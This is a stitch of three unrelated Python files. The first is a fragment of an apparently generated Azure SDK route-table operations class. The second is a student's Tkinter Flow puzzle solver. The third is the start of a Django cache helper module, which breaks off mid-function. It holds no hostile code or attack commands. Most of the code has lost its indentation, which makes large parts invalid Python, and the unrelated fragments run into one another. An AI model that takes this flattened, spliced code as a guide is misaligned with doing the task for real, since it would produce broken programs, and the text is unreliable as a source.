401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualHubRouteTableV2', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
virtual_hub_route_table_v2_parameters, # type: "_models.VirtualHubRouteTableV2"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualHubRouteTableV2"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHubRouteTableV2"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(virtual_hub_route_table_v2_parameters, 'VirtualHubRouteTableV2')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualHubRouteTableV2', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualHubRouteTableV2', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
virtual_hub_route_table_v2_parameters, # type: "_models.VirtualHubRouteTableV2"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualHubRouteTableV2"]
"""Creates a VirtualHubRouteTableV2 resource if it doesn't exist else updates the existing
VirtualHubRouteTableV2.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param route_table_name: The name of the VirtualHubRouteTableV2.
:type route_table_name: str
:param virtual_hub_route_table_v2_parameters: Parameters supplied to create or update
VirtualHubRouteTableV2.
:type virtual_hub_route_table_v2_parameters: ~azure.mgmt.network.v2020_05_01.models.VirtualHubRouteTableV2
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualHubRouteTableV2 or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_05_01.models.VirtualHubRouteTableV2]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHubRouteTableV2"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
route_table_name=route_table_name,
virtual_hub_route_table_v2_parameters=virtual_hub_route_table_v2_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualHubRouteTableV2', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
route_table_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes a VirtualHubRouteTableV2.
:param resource_group_name: The resource group name of the VirtualHubRouteTableV2.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param route_table_name: The name of the VirtualHubRouteTableV2.
:type route_table_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
route_table_name=route_table_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'routeTableName': self._serialize.url("route_table_name", route_table_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables/{routeTableName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
virtual_hub_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ListVirtualHubRouteTableV2SResult"]
"""Retrieves the details of all VirtualHubRouteTableV2s.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVirtualHubRouteTableV2SResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_05_01.models.ListVirtualHubRouteTableV2SResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVirtualHubRouteTableV2SResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ListVirtualHubRouteTableV2SResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/routeTables'} # type: ignore
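# Illustrative usage sketch (assumptions: the management client class and the attribute name this
# operation group is exposed under are not confirmed by this generated file):
#
#     from azure.identity import DefaultAzureCredential
#     from azure.mgmt.network import NetworkManagementClient
#
#     client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
#     poller = client.virtual_hub_route_table_v2_s.begin_create_or_update(
#         resource_group_name="my-rg",
#         virtual_hub_name="my-hub",
#         route_table_name="my-route-table",
#         virtual_hub_route_table_v2_parameters=route_table_model,  # a VirtualHubRouteTableV2 instance
#     )
#     route_table = poller.result()  # blocks until the long-running operation completes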
|
|
#Rootul Patel 10/28/13
#HW9 - FlowSolver
from Tkinter import *
#Define window / lists / constants
window = Tk()
window.title("Flow Solver")
gridSize = 6
clickCount = 0
tileCount = 0
endPoints = []
tileList = []
cells = []
colorList = ["blue", "green", "red", "yellow", "cyan", "orange", "magenta", "pink", "white"]
endPointFileList = ["blueEndpoint.gif", "greenEndpoint.gif", "redEndpoint.gif",
"yellowEndpoint.gif", "cyanEndpoint.gif", "orangeEndpoint.gif",
"magentaEndpoint.gif", "pinkEndpoint.gif", "whiteEndpoint.gif"]
fileList = ["blueHorizontal.gif", "blueQ1.gif", "blueQ2.gif", "blueQ3.gif", "blueQ4.gif", "blueVertical.gif",
"greenHorizontal.gif", "greenQ1.gif", "greenQ2.gif", "greenQ3.gif", "greenQ4.gif", "greenVertical.gif",
"redHorizontal.gif", "redQ1.gif", "redQ2.gif", "redQ3.gif", "redQ4.gif", "redVertical.gif",
"yellowHorizontal.gif", "yellowQ1.gif", "yellowQ2.gif", "yellowQ3.gif", "yellowQ4.gif", "yellowVertical.gif",
"cyanHorizontal.gif", "cyanQ1.gif", "cyanQ2.gif", "cyanQ3.gif", "cyanQ4.gif", "cyanVertical.gif",
"orangeHorizontal.gif", "orangeQ1.gif", "orangeQ2.gif", "orangeQ3.gif", "orangeQ4.gif", "orangeVertical.gif",
"magentaHorizontal.gif", "magentaQ1.gif", "magentaQ2.gif", "magentaQ3.gif", "magentaQ4.gif", "magentaVertical.gif",
"pinkHorizontal.gif", "pinkQ1.gif", "pinkQ2.gif", "pinkQ3.gif", "pinkQ4.gif", "pinkVertical.gif",
"whiteHorizontal.gif", "whiteQ1.gif", "whiteQ2.gif", "whiteQ3.gif", "whiteQ4.gif", "whiteVertical.gif"]
for filename in endPointFileList:
photo = PhotoImage(file="Cell images/" + filename)
for color in colorList:
if color in filename:
photo.color = color
photo.goesUp = photo.goesDown = photo.goesLeft = photo.goesRight = True
endPoints.append(photo)
for filename in fileList:
photo = PhotoImage(file="Cell images/" + filename)
if "Vertical" in filename or "Q1" in filename or "Q2" in filename:
photo.goesUp = True
else:
photo.goesUp = False
if "Vertical" in filename or "Q3" in filename or "Q4" in filename:
photo.goesDown = True
else:
photo.goesDown = False
if "Horizontal" in filename or "Q1" in filename or "Q4" in filename:
photo.goesRight = True
else:
photo.goesRight = False
if "Horizontal" in filename or "Q2" in filename or "Q3" in filename:
photo.goesLeft = True
else:
photo.goesLeft = False
for color in colorList:
if color in filename:
photo.color = color
tileList.append(photo)
empty = PhotoImage(file="Cell images/Empty.gif")
empty.goesUp = empty.goesDown = empty.goesLeft = empty.goesRight = True
wall = PhotoImage(file="Cell images/Wall.gif")
wall.goesUp = wall.goesDown = wall.goesLeft = wall.goesRight = False
#Build Buttons
def makeCells():
global cells
for row in range (0,gridSize+2):
cells.append([])
for col in range (0,gridSize+2):
if row == 0 or col == 0 or row == gridSize+1 or col == gridSize+1:
button = Button(window, image = wall)
button.image = wall
cells[row].append(button)
else:
button = Button(window, image = empty)
button.image = empty
button.grid(row = row, column = col)
cells[row].append(button)
def press(b=button):
global clickCount
if clickCount < 18:
b.config(image = endPoints[clickCount/2])
b.image = endPoints[clickCount/2]
clickCount = clickCount + 1
else:
b.config(image = empty)
b.image = empty
button.config(command = press)
makeCells()
#Solver
def isAllowedRight(curr, right):
if right==empty:
return True
if curr.goesRight and right.goesLeft and curr.color==right.color:
return True
if not curr.goesRight and not right.goesLeft:
return True
if not curr.goesRight and right in endPoints:
return True
return False
def isAllowedLeft(curr, left):
if left==empty:
return True
if curr.goesLeft and left.goesRight and curr.color==left.color:
return True
if not curr.goesLeft and not left.goesRight:
return True
if not curr.goesLeft and left in endPoints:
return True
return False
def isAllowedAbove(curr, up):
if up==empty:
return True
if curr.goesUp and up.goesDown and curr.color==up.color:
return True
if not curr.goesUp and not up.goesDown:
return True
if not curr.goesUp and up in endPoints:
return True
return False
def isAllowedBelow(curr, down):
if down==empty:
return True
if curr.goesDown and down.goesUp and curr.color==down.color:
return True
if not curr.goesDown and not down.goesUp:
return True
if not curr.goesDown and down in endPoints:
return True
return False
def checkCell(row, col):
global cells
curr = cells[row][col].image
right = cells[row][col+1].image
left = cells[row][col-1].image
down = cells[row+1][col].image
up = cells[row-1][col].image
if isAllowedRight(curr, right) and isAllowedLeft(curr, left) and isAllowedAbove(curr, up) and isAllowedBelow(curr, down):
return True
return False
def checkEndpoint():
    global cells
    #Every endpoint must stay reachable: at most one placed tile may feed into it, and if
    #nothing feeds into it yet there must still be an empty neighbor left to connect through
    for row in range (1,gridSize+1):
        for col in range (1,gridSize+1):
            curr = cells[row][col]
            if curr.image in endPoints:
                up = cells[row-1][col].image
                down = cells[row+1][col].image
                left = cells[row][col-1].image
                right = cells[row][col+1].image
                nearbyEmptys = 0
                nearbyGoesIn = 0
                if up == empty:
                    nearbyEmptys += 1
                elif up in tileList and up.goesDown:
                    nearbyGoesIn += 1
                if down == empty:
                    nearbyEmptys += 1
                elif down in tileList and down.goesUp:
                    nearbyGoesIn += 1
                if left == empty:
                    nearbyEmptys += 1
                elif left in tileList and left.goesRight:
                    nearbyGoesIn += 1
                if right == empty:
                    nearbyEmptys += 1
                elif right in tileList and right.goesLeft:
                    nearbyGoesIn += 1
                if nearbyGoesIn > 1:
                    return False
                if nearbyGoesIn == 0 and nearbyEmptys == 0:
                    return False
    return True
##def take(row, col):
## global cells
## global tileCount
## curr = cells[row][col]
## curr.config(image = tileList[tileCount])
## curr.image = tileList[tileCount]
## window.update_idletasks()
## if checkCell(row, col) == True:
## if checkEndpoint() == True:
## if solve() == True:
## tileCount = 0
## return True
## elif tileCount < len(tileList)-1:
## tileCount += 1
## take(row, col)
## else:
## curr.config(image = empty)
## curr.image = empty
## tileCount = 0
## return False
def take(row, col):
global cells
for i in range(len(tileList)):
cells[row][col].config(image = tileList[i])
cells[row][col].image = tileList[i]
window.update_idletasks()
if checkCell(row, col) == True:
if checkEndpoint() == True:
if solve() == True:
return True
cells[row][col].config(image = empty)
cells[row][col].image = empty
return False
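#Backtracking search: solve() finds the first empty cell and take() tries every tile there,
#recursing until the grid is full (success) or every tile fails (backtrack and return False)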
def solve():
global cells
for row in range (1,gridSize+1):
for col in range (1,gridSize+1):
x = cells[row][col]
if x.image == empty:
if take(row, col) == True:
return True
else:
return False
return True
def testCase():
global cells
cells[2][2].config(image = endPoints[0]) #Blue
cells[2][2].image = endPoints[0]
cells[5][3].config(image = endPoints[0])
cells[5][3].image = endPoints[0]
cells[3][4].config(image = endPoints[1]) #Green
cells[3][4].image = endPoints[1]
cells[6][4].config(image = endPoints[1])
cells[6][4].image = endPoints[1]
cells[5][4].config(image = endPoints[2]) #Red
cells[5][4].image = endPoints[2]
cells[6][3].config(image = endPoints[2])
cells[6][3].image = endPoints[2]
cells[2][5].config(image = endPoints[3]) #Yellow
cells[2][5].image = endPoints[3]
cells[5][5].config(image = endPoints[3])
cells[5][5].image = endPoints[3]
solveButton = Button(window, text = "Solve", command = solve)
solveButton.grid(row = 10, column = 1, columnspan = 3, sticky = "NSEW")
testButton = Button(window, text = "Test Case", command = testCase)
testButton.grid(row = 10, column = 4, columnspan = 3, sticky = "NSEW")
window.mainloop()
|
|
from __future__ import absolute_import
from __future__ import print_function
from functools import wraps
from django.core.cache import cache as djcache
from django.core.cache import get_cache
from django.conf import settings
from django.db.models import Q
from typing import Any, Callable, Dict, Iterable, List, Optional
from zerver.lib.utils import statsd, statsd_key, make_safe_digest
import time
import base64
import random
import sys
import os
import os.path
import hashlib
remote_cache_time_start = 0.0
remote_cache_total_time = 0.0
remote_cache_total_requests = 0
def get_remote_cache_time():
# type: () -> float
return remote_cache_total_time
def get_remote_cache_requests():
# type: () -> int
return remote_cache_total_requests
def remote_cache_stats_start():
# type: () -> None
global remote_cache_time_start
remote_cache_time_start = time.time()
def remote_cache_stats_finish():
# type: () -> None
global remote_cache_total_time
global remote_cache_total_requests
global remote_cache_time_start
remote_cache_total_requests += 1
remote_cache_total_time += (time.time() - remote_cache_time_start)
def get_or_create_key_prefix():
# type: () -> str
if settings.TEST_SUITE:
# This sets the prefix mostly for the benefit of the JS tests.
# The Python tests overwrite KEY_PREFIX on each test.
return 'test_suite:' + str(os.getpid()) + ':'
filename = os.path.join(settings.DEPLOY_ROOT, "remote_cache_prefix")
try:
fd = os.open(filename, os.O_CREAT | os.O_EXCL | os.O_RDWR, 0o444)
prefix = base64.b16encode(hashlib.sha256(str(random.getrandbits(256))).digest())[:32].lower() + ':'
# This does close the underlying file
with os.fdopen(fd, 'w') as f:
f.write(prefix + "\n")
except OSError:
# The file already exists
tries = 1
while tries < 10:
with open(filename, 'r') as f:
prefix = f.readline()[:-1]
if len(prefix) == 33:
break
tries += 1
prefix = ''
time.sleep(0.5)
if not prefix:
print("Could not read remote cache key prefix file")
sys.exit(1)
return prefix
KEY_PREFIX = get_or_create_key_prefix() # type: str
def bounce_key_prefix_for_testing(test_name):
# type: (str) -> None
global KEY_PREFIX
KEY_PREFIX = test_name + ':' + str(os.getpid()) + ':'
def get_cache_backend(cache_name):
    # type: (Optional[str]) -> Any
if cache_name is None:
return djcache
return get_cache(cache_name)
def cache_with_key(keyfunc, cache_name=None, timeout=None, with_statsd_key=None):
# type: ignore # CANNOT_INFER_LAMBDA_TYPE issue with models.py
"""Decorator which applies Django caching to a function.
Decorator argument is a function which computes a cache key
from the original function's arguments. You are responsible
for avoiding collisions with other uses of this decorator or
other uses of caching."""
def decorator(func):
# type: (Callable[..., Any]) -> (Callable[..., Any])
@wraps(func)
def func_with_caching(*args, **kwargs):
            # type: (*Any, **Any) -> Any
key = keyfunc(*args, **kwargs)
val = cache_get(key, cache_name=cache_name)
extra = ""
if cache_name == 'database':
extra = ".dbcache"
if with_statsd_key is not None:
metric_key = with_statsd_key
else:
metric_key = statsd_key(key)
status = "hit" if val is not None else "miss"
statsd.incr("cache%s.%s.%s" % (extra, metric_key, status))
# Values are singleton tuples so that we can distinguish
# a result of None from a missing key.
if val is not None:
return val[0]
val = func(*args, **kwargs)
cache_set(key, val, cache_name=cache_name, timeout=timeout)
return val
return func_with_caching
return decorator
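# Illustrative usage sketch (hypothetical key scheme and functions, for documentation only):
# the keyfunc turns the call's arguments into a cache key, and the decorator serves the cached
# value on a hit and stores the computed value on a miss.
#
#     def example_settings_cache_key(user_id):
#         # type: (int) -> str
#         return "example_settings:%d" % (user_id,)
#
#     @cache_with_key(example_settings_cache_key, timeout=3600 * 24)
#     def get_example_settings(user_id):
#         # type: (int) -> Dict[str, Any]
#         return load_example_settings(user_id)  # hypothetical loader that hits the database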
def cache_set(key, val, cache_name=None, timeout=None):
# type: (str, Any, Optional[str], Optional[int]) -> Any
remote_cache_stats_start()
cache_backend = get_cache_backend(cache_name)
ret = cache_backend.set(KEY_PREFIX + key, (val,), timeout=timeout)
remote_cache_stats_finish()
return ret
def cache_get(key, cache_name=None):
# type: (str, Optional[str]) -> Any
remote_cache_stats_start()
cache_backend = get_cache_backend(cache_name)
ret = cache_backend.get(KEY_PREFIX + key)
remote_cache_stats_finish()
return ret
def cache_get_many(keys, cache_name=None):
# type: (List[str], Optional[str]) -> Dict[str, Any]
keys = [KEY_PREFIX + key for key in keys]
remote_cache_stats_start()
ret = get_cache_backend(cache_name).get_many(keys)
remote_cache_stats_finish()
return dict([(key[len(KEY_PREFIX):], value) for key, value in ret.items()])
def cache_set_many(items, cache_name=None, timeout=None):
# type: (Dict[str, Any], Optional[str], Optional[int]) -> Any
new_items = {}
for key in items:
new_items[KEY_PREFIX + key] = items[key]
items = new_items
remote_cache_stats_start()
ret = get_cache_backend(cache_name).set_many(items, timeout=timeout)
remote_cache_stats_finish()
return ret
def cache_delete(key, cache_name=None):
# type: (str, Optional[str]) -> None
remote_cache_stats_start()
get_cache_backend(cache_name).delete(KEY_PREFIX + key)
remote_cache_stats_finish()
def cache_delete_many(items, cache_name=None):
# type: (Iterable[str], Optional[str]) -> None
remote_cache_stats_start()
get_cache_backend(cache_name).delete_many(
KEY_PREFIX + item for item in items)
remote_cache_stats_finish()
# Required Arguments are as follows:
# * object_ids: The list of object ids to look up
# * cache_key_function: object_id => cache key
# * query_function: [object_ids] => [objects from database]
# Optional keyword arguments:
# * setter: Function to call before storing items to cache (e.g. compression)
# * extractor: Function to call on items returned from cache
# (e.g. decompression). Should be the inverse of the setter
# function.
# * id_fetcher: Function mapping an object from database => object_id
# (in case we're using a key more complex than obj.id)
# * cache_transformer: Function mapping an object from database =>
# value for cache (in case the values that we're caching are some
# function of the objects, not the objects themselves)
def generic_bulk_cached_fetch(cache_key_function, query_function, object_ids,
extractor=lambda obj: obj,
setter=lambda obj: obj,
id_fetcher=lambda obj: obj.id,
cache_transformer=lambda obj: obj):
# type: (Callable[[Any], str], Callable[[List[int]], List[Any]], List[int], Callable[[Any], Any], Callable[[Any], Any], Callable[[Any], Any], Callable[[Any], Any]) -> Dict[int, Any]
cache_keys = {} # type: Dict[int, str]
for object_id in object_ids:
cache_keys[object_id] = cache_key_function(object_id)
cached_objects = cache_get_many([cache_keys[object_id]
for object_id in object_ids])
for (key, val) in cached_objects.items():
cached_objects[key] = extractor(cached_objects[key][0])
needed_ids = [object_id for object_id in object_ids if
cache_keys[object_id] not in cached_objects]
db_objects = query_function(needed_ids)
items_for_remote_cache = {} # type: Dict[str, Any]
for obj in db_objects:
key = cache_keys[id_fetcher(obj)]
item = cache_transformer(obj)
items_for_remote_cache[key] = (setter(item),)
cached_objects[key] = item
if len(items_for_remote_cache) > 0:
cache_set_many(items_for_remote_cache)
return dict((object_id, cached_objects[cache_keys[object_id]]) for object_id in object_ids
if cache_keys[object_id] in cached_objects)
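# Illustrative usage sketch (hypothetical key function; UserProfile stands in for any model):
# serve whatever is already in the cache and hit the database only for the missing ids.
#
#     def example_profile_cache_key(user_profile_id):
#         # type: (int) -> str
#         return "example_profile:%d" % (user_profile_id,)
#
#     profiles_by_id = generic_bulk_cached_fetch(
#         cache_key_function=example_profile_cache_key,
#         query_function=lambda ids: list(UserProfile.objects.filter(id__in=ids)),
#         object_ids=[1, 2, 3])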
def cache(func):
# type: ignore # CANNOT_INFER_FUNC_TYPE
"""Decorator which applies Django caching to a function.
Uses a key based on the function's name, filename, and
the repr() of its arguments."""
func_uniqifier = '%s-%s' % (func.__code__.co_filename, func.__name__)
@wraps(func)
def keyfunc(*args, **kwargs):
# type: (*Any, **Any) -> str
# Django complains about spaces because memcached rejects them
key = func_uniqifier + repr((args, kwargs))
return key.replace('-', '--').replace(' ', '-s')
return cache_with_key(keyfunc)(func)
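# Illustrative usage sketch (hypothetical function): the cache key is built automatically from
# the decorated function's filename, name, and the repr() of its arguments.
#
#     @cache
#     def example_expensive_lookup(name):
#         # type: (str) -> str
#         return compute_expensive_value(name)  # hypothetical expensive computation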
def message_cache_key(message_id):
# type: (int) -> str
return "message:%d" % (message_id,)
def display_recipient_cache_key(recipient_id):
# type: (int) -> str
return "display_recipient_dict:%d" % (recipient_id,)
def user_profile_by_email_cache_key(email):
# type: (str) -> str
# See the comment in zerver/lib/avatar.py:gravatar_hash for why we
# are proactively encoding email addresses even though they will
# with high likelihood be ASCII-only for the foreseeable future.
return 'user_profile_by_email:%s' % (make_safe_digest(email.strip()),)
def user_profile_by_id_cache_key(user_profile_id):
# type: (int) -> str
return "user_profile_by_id:%s" % (user_profile_id,)
# TODO: Refactor these cache helpers into another file that can import
# models.py so that we can replace many of these type: Anys
def cache_save_user_profile(user_profile):
# type: (Any) -> None
cache_set(user_profile_by_id_cache_key(user_profile.id), user_profile, timeout=3600*24*7)
active_user_dict_fields = ['id', 'full_name', 'short_name', 'email', 'is_realm_admin', 'is_bot'] # type: List[str]
def active_user_dicts_in_realm_cache_key(realm):
# type: (Any) -> str
